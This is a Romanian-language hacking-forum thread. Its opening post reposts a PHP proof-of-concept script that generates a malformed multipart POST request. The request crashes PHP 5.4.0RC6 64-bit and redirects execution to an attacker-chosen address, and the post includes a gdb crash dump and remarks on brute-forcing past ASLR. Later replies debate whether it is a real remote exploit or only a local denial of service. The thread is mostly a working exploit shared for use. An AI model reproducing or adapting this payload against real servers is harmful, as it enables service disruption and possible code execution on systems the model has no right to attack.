The_Arhitect Posted February 5, 2012 Report Posted February 5, 2012 PHP 5.4.0RC6 64bit Denial of Service<?php/* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111 (C) Copyright 2012 Stefan Esser PHP 5.3.9 requires you to know the address of a writable address filled with NULL. 32bit requires you to create a fake 32bit Hashtable instead of a 64bit one Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around 4000 tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX better exploit might be possible after deeper research + heap massage This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS(gdb) cContinuing.Program received signal SIGSEGV, Segmentation fault.0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1, __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350) at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398398 ht->pDestructor(p->pData);(gdb) i rrax 0x7fd9583352a0 140571464389280rbx 0x0 0rcx 0x8 8rdx 0x111111111111111 76861433640456465rsi 0x7fd95a077b08 140571495070472rdi 0x7fd9583352a0 140571464389280rbp 0x7fff75c47ae0 0x7fff75c47ae0rsp 0x7fff75c47a80 0x7fff75c47a80r8 0x7fff75c47bc8 140735169199048r9 0x1 1r10 0x6238396661373430 7077469926293189680r11 0x7fd962f4c8e0 140571644840160r12 0x7fd966b91da8 140571708038568r13 0x0 0r14 0xffffffff00000001 -4294967295r15 0x7fd964b10538 140571673953592rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>eflags 0x10206 [ PF IF RF ]cs 0x33 51ss 0x2b 43ds 0x0 0es 0x0 0fs 0x0 0gs 0x0 0(gdb) x/5i $rip=> 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>: callq *%rdx 0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>: cmpl $0x8,-0x3c(%rbp) 0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>: jne 0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625> 0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>: mov -0x18(%rbp),%rax 0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>: mov 0x10(%rax),%rax(gdb)*/ $boundary = md5(microtime()); $varname = "xxx"; $payload = ""; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n"; $payload .= chr(16); for ($i=1; $i<7*8; $i++) { $payload .= chr(0); } for ($i=1; $i<8; $i++) { $payload .= "\x11"; } $payload .= chr(1); for ($i=16+48+1; $i<128; $i++) { $payload .= chr(0); } $payload .= "\n"; for ($i=0; $i<1000; $i++) { $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="aaa'.$i.'"'."\n\n"; $payload .= "aaa\n"; } $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n\n"; $payload .= "aaa\n"; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n\n"; $payload .= "aaa\n"; $payload .= "--$boundary--\n"; echo "POST /index.php HTTP/1.0\n"; echo "Content-Type: multipart/form-data; boundary=$boundary\n"; echo "Content-Length: ",strlen($payload),"\n"; echo "\n"; echo "$payload";?>Sursa: PHP 5.4.0RC6 64bit Denial of Service Quote
crisit2008 Posted February 8, 2012 Report Posted February 8, 2012 Si... face ce? Explici si la incepatori? Quote
backdoor Posted February 8, 2012 Report Posted February 8, 2012 The_Arhitect Nu te supara ca iti zic, Copy paste stie sa face multa lume. In primul si in primul rand, daca te uiti tu mai bine , fiserul tau este un script php ... Care ce face ? Local DOS ? HAHAHA ... ASTA POTI SA FACI SI cu un while();Daca nu am dreptate lumineaza-ma ! Te rog ! Quote
The_Arhitect Posted February 9, 2012 Author Report Posted February 9, 2012 (edited) The_Arhitect Nu te supara ca iti zic, Copy paste stie sa face multa lume. In primul si in primul rand, daca te uiti tu mai bine , fiserul tau este un script php ... Care ce face ? Local DOS ? HAHAHA ... ASTA POTI SA FACI SI cu un while();Daca nu am dreptate lumineaza-ma ! Te rog !Altele apar pe parcurs. Edited February 12, 2012 by The_Arhitect Quote
backdoor Posted February 11, 2012 Report Posted February 11, 2012 The_Arhitect eu cred ca tu incepi sa ma placi da nu stii cum sa mi-o zici. Proababil personalitatea ta e foarte puternica....Nytro Stiu ca nu e acelasi lucru. Un script de genu asta implica sa ai cel putin ftp access pe server . Si pana la urma la ce iti foloseste sa ii tot pici serverul aluia ? Oricum nu il rupi prea tare pt ca mod_php nu se mai foloseste de ceva timp. Plus ca adminul poate sa vada ce process ii rupe serverul si iti rade aplicatia.Sincer Domnule arhitect nu vad la ce ar folosi. Quote
Nytro Posted February 12, 2012 Report Posted February 12, 2012 Nu stiu daca ai observat, dar acolo se genereaza un request HTTP, care se presupune a fi trimis catre un server. Ok, Denial Of Service, adica sa primesti cateva mii de request-uri nu e nimic, tu avand 3 trilioane de procesoare, da, nu este problema, dar este ce mai mult de atat."try to execute code at 0x1111111111111111"for ($i=1; $i<8; $i++) { $payload .= "\x11"; }Asta nu spune nimic? Quote
backdoor Posted February 15, 2012 Report Posted February 15, 2012 Da Nitro ai dreptate . O fi , super tare exploitul . Acum am si eu o curiozitate ce OS are PHP 5.4.0RC6 ?????????????? Chiar as vrea sa il testez ! Quote
